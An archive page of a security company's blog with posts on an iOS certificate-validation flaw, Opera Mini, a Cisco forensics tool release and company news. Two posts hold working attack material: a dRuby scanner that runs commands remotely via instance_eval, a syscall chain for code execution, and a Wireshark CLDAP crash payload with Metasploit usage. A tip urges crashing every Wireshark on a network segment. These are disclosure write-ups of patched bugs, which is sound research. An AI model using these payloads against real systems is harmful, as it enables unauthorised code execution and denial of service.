Wed Jan 25 14:38:20 CET 2017

Get well soon, FX

This post was written to update you on the current situation of our dear friend
and CEO Felix 'FX' Lindner. It will be used to keep you updated on FX's
progress. Please understand that updates won’t happen regularly.

Some of you already heard the news, but some haven’t. To cut the sad story of a
long journey short: FX suffered from cerebral bleeding (aneurysm) in early July
2016. He underwent several surgeries, which thankfully all went well –
considering the circumstances. Unfortunately, FX is under medical supervision
since. Just recently, he was moved from medical care to a specialized
rehabilitation institution, where his health situation will hopefully improve
even further. The journey to a full recovery is still ahead of him and will
take an indefinite amount of time. Be assured that his family and everyone at
Recurity Labs supports him to make sure that he receives the best imaginable
treatment available.

If you feel like sending encouraging words to FX, his family, or even us,
please write to Please note that all messages
will be read and filtered by the responsible people at Recurity Labs and
forwarded as we see fit. This has been made a requirement by FX's family in
order to enable us to responsibly channel such messages depending on FX' state
of health. However, no messages will be left unread or deleted without at least
passing your name and wishes along.

We want to thank you for your discretion during the last half year, your
respectful manners and your sympathy transmitted electronically or verbally in
various ways. But most importantly, we wish FX a fast and full recovery!

All the best and thank you,

FX's family and the team at Recurity Labs

Posted by The Recurity Labs Team | Permanent link

Wed Feb 1 20:07:04 CET 2012

Cisco Incident Response (CIR) 1.1 Open Source Release

Recurity Labs created a system for the inspection of Cisco legacy IOS memory dumps back in 2008. The tool, called Cisco Incident Response, was meant to identify successful and unsuccessful exploits of binary nature against Cisco routers running IOS 11.x and 12.x. IOS 15.x is now available, but doesn't differ much from the previous releases in terms of internal design.

We ran an online service for uploading and analyzing IOS images together with core dumps generated from them. This service has been used by various people, but not a single core dump contained indications of an actual binary exploit against the platform. It seems that it's simply too easy to pwn a company by traditional means of browser, Flash, Java, EXE file in email, social engineering or cloud service.

To support nostalgic hobbyists concerning themselves with the same questions half a decade later, we decided to publish the source code of CIR today, in order to allow anyone to use it and inspect its inner workings. We believe that Kerckhoff's Principle also holds true for defense and detection systems. Therefore it is educating to look at code bases that have been tested in production for quite some time.

The code is interesting besides the embedded knowledge about Cisco IOS data structures. Here are a couple of points for the inclined reader:

  • 23k lines of code, completely managed .NET (C#)
  • Plug-in based knowledge system, where every plug-in consumes and provides some type of abstracted information about the subject, formulated by .NET types
  • Several lists with differing offsets between IOS minor versions and service releases, for those assuming that IOS data structures will always look the same between e.g. 12.4.3 and 12.4.3J.
  • An ELF file format parser that could be useful in other projects
  • Report generation and daemon mode, to allow CIR to be used in corporate and provider networks automatically.
The code is released under GPLv3, and can be found at We also provide a binary distribution for those who simply want to use it.

Posted by FX | Permanent link

Tue Aug 9 18:34:11 CEST 2011

CVE-2011-0228 and the Opera Mini UI-Design

Recurity Labs received user reports, followed by our own tests, that Opera Mini is affected by the CVE-2011-0228 X.509 certificate validation issue, orginially reported for Apple iOS.

Upon filing a bug with Opera Software (ID SKIRNE-136848), we tried to contact them directly. With some external help, we managed to get in contact with security people at Opera and received the following interesting statement:

Thanks for reporting an issue with Opera.

While you are correct that Opera Mini does not display a certificate
warning about chains with unknown Root certificates, there is, however,
a significant difference between what happened in iOS and what happens
in Opera Mini. Opera Mini will not indicate that such pages are secure,
that is, no padlock or similar indication is displayed for the web site
affected by this, giving the same security indications as it would for
an unencrypted site, which is the same as would have been displayed if
the user manually accepted the certificate.

Not showing a dialog was a design decision by the Opera Mini team, due
to the transcoder architecture of Opera Mini, and in part the
complexity of having the transcoder (proxy) server display a dialog at
the device and the obtain the result before continuing.

For more about Opera Mini security see

Reviewing the provided FAQ URL, we can learn that Opera Mini will show a padlock (at the top right corner) if the connection to the web site was secured. No padlock is shown for unsecured sites using HTTP.
When testing Opera Mini with, no padlock is shown. However, the URL in the address bar still says https:// with no indication that anything might be wrong with that. Judging from the user feedback we received, it is not clear to the users that the absense of the padlock means that the certificate validation failed.
In our emulation environment, we also discovered that on small screen devices, the padlock might not even be on-screen when loading a site.

Opera could easily display the failed certificate verification using other means than dialog boxes, e.g. through a red background in the address bar, similar to Internet Explorer.
Given the current approach, we recommend to not use Opera Mini for anything requiring a secure connection to a web site, especially considering that Opera Mini does not provide end-to-end encryption in any case.

Posted by FX | Permanent link

Tue Jul 26 22:25:23 CEST 2011

CVE-2011-0228 iOS certificate chain validation issue in handling of X.509 certificates

Recurity Labs recently conducted a project for the German Federal Office for Information Security (BSI), which (amongst others) also concerned the iOS platform. During the analysis, a severe vulnerability in the iOS X.509 implementation was identified. When validating certificate chains, iOS fails to properly check the X.509v3 extensions of the certificates in the chain. In particular, the "Basic Constraints" section of the supplied certificates are not verified by iOS. In the Basic Constraints section, the issuer of a certificate can encode whether or not the issued certificate is a CA certificate, i.e. whether or not it may be used to sign other certificates. Not checking the CA bit of a certificate basically means that every end-entity certificate can be used to sign further certificates. To provide an example: When a CA issues a certificate to a Web site, the CA will usually set the CA bit of this certificate to false. Assume, the attacker has such a certificate, issued by a trusted CA to The attacker can now use their private key to sign another certificate, which may contain arbitraty data. This could for instance be a certificate for or even worse, it could be a certificate containing multiple common names: *.*, *.*.*, ... iOS fails to check whether the attacker's certificate was actually allowed to sign subsequent certificates and considers the so created univeral certificate as valid. The attacker could now use this certificate to intercept all SSL/TLS traffic originating from an iOS device. However, SSL/TLS is not the only use of X.509. Every application that makes use of the iOS crypto framework to validate chains of X.509 certificates is vulnerable.

The idea that Apple could have made a 8 year old mistake was suggested by Bernhard 'bruhns' Brehm.

To test whether your iOS version is vulnerable, Recurity Labs has set up a Web site: If the Safari browser on your iDevice allows you to visit this site without issuing a warning, your device is vulnerable. The certificate for this site was created using the above described technique. Please feel free to validate this by inspecting the certificate that the HTTP server supplies to you.

Posted by Greg | Permanent link

Thu May 12 18:06:51 CEST 2011

dRuby for Penetration Testers

I like Ruby somehow, a nice and shiny programming language. At some point last year, I decided to have a closer look at 'Distributed Ruby' (also called dRuby). dRuby is all about easily usable objects and method invocations over the network.

So no long words: let's just drop into some simple dRuby server code:

01  require 'drb/drb'
02  URI="druby://localhost:8787"
03  class TimeServer
04    def get_current_time
05      return
06    end
07  end
09  $SAFE = 1 # disable eval() and friends
10  DRb.start_service(URI, FRONT_OBJECT)
11  DRb.thread.join

Lines 03 to 07 define a class TimerServer with the method get_current_time. All the magic happens in line 10 where the dRuby service is started along with the TimeServer class as exposed Object. You'll probably have noticed line 09 where it says $SAFE = 1. This nifty variable turns on tainting and should disallow you from calling arbitrary code on the server side (that's basically what the documentation says). No worries, we'll come back later to circumventing $SAFE.

But first, let's look at the client side. Using this service would be as simple as:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 timeserver = DRbObject.new_with_uri(SERVER_URI)
05 puts timeserver.get_current_time

So here after starting the dRuby service in line 03, and getting a remote object in line 04, we can simply call methods of that object over the wire. This is done in line 05. That's all what's needed for a dRuby client.

Now let's start building a more useful client. Namely a scanner for $SAFE being set.

01 #!/usr/bin/ruby
02 require 'drb/drb'
04 # The URI to connect to
07 DRb.start_service
08 undef :instance_eval
09 t = DRbObject.new_with_uri(SERVER_URI)
11 begin
12 a = t.instance_eval("`id`")
13 puts "[*] eval is enabled - you are:"
14 puts a
15 rescue  SecurityError => e
16 puts "[*] sorry, eval is disabled"
17 rescue  => e
18 puts "[*] likely not a druby port"
19 end

This scanner cheks remotely if the developer forgot to set $SAFE. It will tell you the ID of the user running the dRuby service. Of course you are free to alter this in order to do more fun stuff with the server, or you could just use the respective Metasploit module.

But now back from shiny Ruby world to some Bughunting. So: what could possibly go wrong when pushing serialized objects back and forth on the wire?

My first attempts of poking around in dRuby with $SAFE set were as follows:

01 require 'drb/drb'
02 SERVER_URI="druby://localhost:8787"
03 DRb.start_service
04 t = DRbObject.new_with_uri(SERVER_URI)
05 t.eval("`id`")

Here in line 05 I tried to call eval on the remote object. Unfortunately this resulted in the following error:

NoMethodError: private method `eval' called for #<TimeServer:0xb7821a88>:TimeServer

During playing around further with dRuby, and looking further into the source, I found the following piece of code in drb/drb.rb:

    # List of insecure methods.
    # These methods are not callable via dRuby.

Here, __send__ gets blacklisted from being called via dRuby. However, and unfortunately, there's also an existing send method, as described in the Ruby documentation:

obj.send(symbol [, args...]) -> obj
obj.__send__(symbol [, args...]) -> obj

Invokes the method identified by symbol, passing it any arguments specified. 
You can use __send__ if the name send clashes with an existing method in obj. 

This very send method should give us the ability to call private methods on the object as follows:

t.send(:eval, "`id`")

This somehow worked but we run into another error:

SecurityError: Insecure operation - eval

I tried various functions taken from the class Object and the Kernel module; but all interesting functions were caught by a SecurityError. Wait a minute, really all of them? No, one little function was still willing to execute - and that function is syscall. So basically, we get free remote syscalls on the server side. When I reported this to the dRuby author, turns out, tainting (which causes the SecurityError) was forgotten for syscalls.

In order to exploit this issue properly, we need a rather simple combination of syscalls to gain arbitrary command execution:

  • open() or creat() a file with permissions 777
  • write() some Ruby code to it
  • close() the file
  • fork() so that the dRuby service keeps running
  • execve() the just created file
This nice combo of syscalls is implemented in the Metasploit module as well. Alors! go out and play with it :)

If you take a closer look at the Metasploit module, you'll see a neat little trick i came up with: At first, when connecting, it's not possible to decide whether we are on a 32 Bit or 64 Bit target system. Additionally the syscall numbers are different for those two versions of Linux. So i choose syscall 20, which is getpid() on 32bit systems, on 64bit systems it's syscall writev(). So when we call this syscall with no arguments, it should succeed on 32bit systems. On 64bit systems, it will raise an error due to missing arguments. We can then catch this error and use our 64bit syscall numbers.

Thanks at this point go out to two Metasploit guys: bannedit who poked me to put together an all-in-one exploit, and egypt who improved the instance_eval payload.

Last but not least, a short disclaimer: Both aforementioned modules might not work as exepected on different Ruby versions, as some of these have been patched (by turning on tainting), and some won't have syscall implemented at all. The modules have been tested and found to work with the exploit with the following versions or Ruby: Ruby 1.8.7 patchlevel 249; Ruby 1.9.0; Ruby 1.9.1 patchlevel 378 (all running on Linux 32 Bit systems). Tested as well and found vulnerable has been the 64 Bit version on Ubuntu 10.10 with both ruby1.8 and ruby1.9 packages.

Posted by Joern | Permanent link

Wed Mar 9 18:34:04 CET 2011

At least, I got DoS

On January 11th, a new version of Wireshark has been released. The release contained several security-relevant fixes. Inspired by this fact, on a rainy evening I decided to have a closer look. 'There must be a bit more of that', I thought.

So I fired up my browser and helped myself to the latest Wireshark sorce code (which was version 1.4.3 at that point of time). After unpacking it, I went straight to the dissectors, which reside in the souce directory under epan/dissectors (that I knew from reading the advisories for the bugs fixed in 1.4.3).

Due to Wireshark having more than 1,000 different packet dissectors in this directory, I chose a pretty dumb approach to find interesting code parts:

/wireshark-1.4.3/epan/dissectors$ grep -Hrn memcpy packet-* | less
- a command that yields 553 results. So I scrolled through that list for a bit and finally decided to take a closer look at packet-ldap.c, containing the following tvb_memcpy call:
packet-ldap.c:4020:    tvb_memcpy(tvb, str, offset, len);
The corresponding function is:
int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)

- which can be found in line 3974 of packet-ldap.c.

The reason why I greped for memcpy was that I hoped to find some code where memcpy is used in a way which introduces a Buffer Overflow.

I quickly checked the tvb_memcpy function for what it does. It is defined in /epan/tvbuff.c and as I suspected, it's a wrapper around good old memcpy which copies from the packet buffer at offset exactly len bytes to str.

But now let's have a look at the function body:

01 int dissect_mscldap_string(tvbuff_t *tvb, int offset, char *str, int maxlen, gboolean prepend_dot)
02 {
03  guint8 len;

04  len=tvb_get_guint8(tvb, offset);
05  offset+=1;
06  *str=0;
07  attributedesc_string=NULL;

08  while(len){
09    /* add potential field separation dot */
10    if(prepend_dot){
11      if(!maxlen){
12        *str=0;
13        return offset;
14      }
15      maxlen--;
16      *str++='.';
17      *str=0;
18    }

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

29    prepend_dot=TRUE;

30    if(maxlen<=len){
31      if(maxlen>3){
32        *str++='.';
33        *str++='.';
34        *str++='.';
35      }
36      *str=0;
37      return offset; /* will mess up offset in caller, is unlikely */
38    }
39    tvb_memcpy(tvb, str, offset, len);
40    str+=len;
41    *str=0;
42    maxlen-=len;
43    offset+=len;

44    len=tvb_get_guint8(tvb, offset);
45    offset+=1;
46  }
47  *str=0;
48  return offset;
49 }

The part I grep'ed for can be found on line 39, where tvb_memcpy copies from the tvb buffer into str. The tvb buffer is the buffer holding the packet data that came across the wire. At this point, my question was:

Can we overflow str in this function?

Unfortunately, turns out we can't. First I checked all calls to this function, and all calls came with a 256 byte long char buffer and a maxlen set to 255. The part of the packet at offset is a length field followed by a string of that length. The length len, which is read as an 8-Bit-value form the tvb buffer in line 04 cannot be greater than 255. And a proper check for maxlen (sized sufficiently) is performed in line 30.

Now you may ask, 'WhyTF does he bore me with non-exploitable code?!' Well, as the title already suggests - at least, I got DoS.

On line 19, a special case is handled, namely compressed strings. This means by a length of 0xc0, it is denoted that the following string is not a string of length 0xc0, but rather an offset into the packet referencing another string. This concept was familiar to me, it's used in DNS as well. Not so suprisingly there were issues within DNS handling code regarding those compressed strings.

Such compressed strings look like this, for instance: We have string1, describing '', at offset 0x23; plus we have another string2, which is '', at another offset. This string2 can be compressed to '\x03foo\xc0\x23' - so now we'd have a string2 containing the length of 'foo' (\x03), and a reference to the offset which contains '\x08recurity\x03com'.

Let's read that part again:

19    if(len==0xc0){
20      int new_offset;
21      /* ops its a mscldap compressed string */

22      new_offset=tvb_get_guint8(tvb, offset);
23      if (new_offset == offset - 1)
24        THROW(ReportedBoundsError);
25      offset+=1;

26      dissect_mscldap_string(tvb, new_offset, str, maxlen, FALSE);

27      return offset;
28    }

As you can see, in line 26 there's a recursive call to dissect_mscldap_string. And in line 23, the offset is checked for not pointing to itself, because this would cause an infinite recursion. But, wait a minute - what if...

   +--------+   +--------+
   | label1 |   | label2 |
   +--------+   +--------+
     \__^_________^ /

...there was a label1 pointing to a label2, with that label2 pointing to label1 again?!

With this wee little trick we'd pass the self-reference check, but also gain infinite recursion, as both strings reference each other.

I decided I definetly wanted a PoC for this bug. Even if it's 'just a DoS', it might be entertaining enough to crash other folks' Wireshark ;) Developing a PoC was pretty straight forward. Again I chose kind of a lazy approach: Since the code handles Connectionless LDAP (hence CLDAP), I searched on the Internet for a bit and found this fancy site, where I grabbed the file 'samba4-join-rtl8139.pcap' containing some CLDAP packets. Wireshark happily dissected the CLDAP packets, especially the netlogon response:

The highlighted part contains a string reference to the very first string labeled 'Forest' with offset 0x18. So I dumped the whole UDP payload of that packet and pasted it into scapy. After this, I replaced the 'Forest' string with a reference to offset 0x1A and a reference back to 0x18 directly afterwards. In scapy, it'd look like this:

\xf9\x60\xb4" + "\xc0" + "\x1a"  +  "\xc0" + "\x18" +  "\x0e\x63\x6f\x6e\x74\x61\x63\x74\x2d\x73\x61\x6d\x62\x61\x34\xc0\x18\x0a

This did the job just right - Wireshark silently crashed when sniffing on the loopback device.

This issue has been fixed in Wireshark version 1.4.4 which you can get here. Additionally I wrote a ready to use Metasploit Module which is availabe via msfupdate. The usage is quite simple:

msf > use auxiliary/dos/wireshark/cldap 
msf auxiliary(cldap) >show options

Module options (auxiliary/dos/wireshark/cldap):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  389              yes       The destination port
   SHOST                   no        This option can be used to specify a spoofed source address

msf auxiliary(cldap) > set RHOST
msf auxiliary(cldap) > run 

Pro-tip: Use the local networks' broadcast address as RHOST to crash all vulnerable Wiresharks running in your network segment :).

Posted by Joern | Permanent link

Thu May 27 14:43:26 CEST 2010

Jail-breaking the Cisco Unified Communication Manager (CUCM)

We have a long and very good relation to the Cisco PSIRT team, reporting vulnerabilities to them and patiently waiting until fixes are provided. But some things, we simply don't consider to be vulnerabilities in the typical sense of the word. This includes artifacts of product behavior that allow you to get the type of the access to the product that you would expect.

The reasoning is that you already have to have a legitimate operating system administrator account on the CUCM, in order to "escalate" your privileges to a remote root shell. That the legitimate operating system administrator account, as provided by the product, isn't actually root, doesn't change the privilege situation one bit. Also, other people have published other guides (e.g. this one) before.

Therefore, we have decided to publish an article on how to gain the access you may want.

Please use this information only on lab systems or virtual installations. It is not recommended to root any actual Cisco appliance and will most likely void your warranty.

Posted by FX | Permanent link

Wed May 26 17:53:44 CEST 2010

Carnival of the Cultures 2010

A great team needs a good environment to work in, and the environment doesn't stop at the office door. The cultural space in which you live also plays an important role and influences how people think and work. Berlin, home to Recurity Labs, luckily provides a rich and multifarious culture, which all of us enjoy a lot. Therefore, we occasionally want to give back to that environment, doing our little part to make it blossom some more.

For this year's Carnival of the Cultures, a multicultural street parade, we had the opportunity to support [multi:mat] and our long time DJ Friends from Dangerous Drums with getting their float onto the parade.

Our motto for this float: Work hard - Party harder!

We would like to thank [multi:mat] and Dangerous Drums for the making this all possible and of course the hundreds of thousands of people that participated in the parade.

Posted by FX | Permanent link | File under: events

Fri Mar 5 12:39:20 CET 2010

Guest Blogger at Microsoft BlueHat Blog

The Microsoft BlueHat team invited me to publish a rant on their BlueHat blog on TechNet. Of course, I had to deliver: Parser Central: Microsoft .NET as a Security Component

Posted by FX | Permanent link | File under: rants

Thu Jan 29 19:15:02 CET 2009

Corporate Responsibility

During a non public security event, I saw a presentation by Olaf Kolkman about the new DNS server named Unbound. When he mentioned that the whole thing is written in C for performance reasons, I returned that we should simply stop developing production software in languages that produce unmanaged code. We got into quite some discussions with the whole audience after that, many people stating that there isn't an alternative and everything else is just to slow. I'm not buying this for many obvious reasons, but that's for another post.

To put our abilities where my mouth is, we ended up performing a short source code audit for the Unbound developers. After all, Unbound is an effort to produce a reliable, validating and DNSSEC ready name server, something we all want to have deployed on a larger scale. Sergio Alvarez, who by the way will be speaking at CanSecWest this year, looked at the code and found it surprisingly not riddled with remote code execution bugs. I was certainly happy about that find, because it meant the next generation DNS server deployments wouldn't look at a future comparable to ISC bind's past.

That impression, however, was largely because Sergio compiled the code with all the ASSERT statements intact. Now, people running heavy duty production DNS servers will most certainly try to make it as fast as possible, instructing the compiler to get rid of “debug” features like ASSERTs. That might not be a good idea. So here is another lesson learned: When building for production, you might want to keep those ASSERTs compiled in, since your server crashing on funny packets is probably better than to share the administrative control of the machine.

Other than that, I hope the Unbound team keeps up the good work, so people have one less excuse to not move to DNSSEC.

Posted by FX | Permanent link | File under: events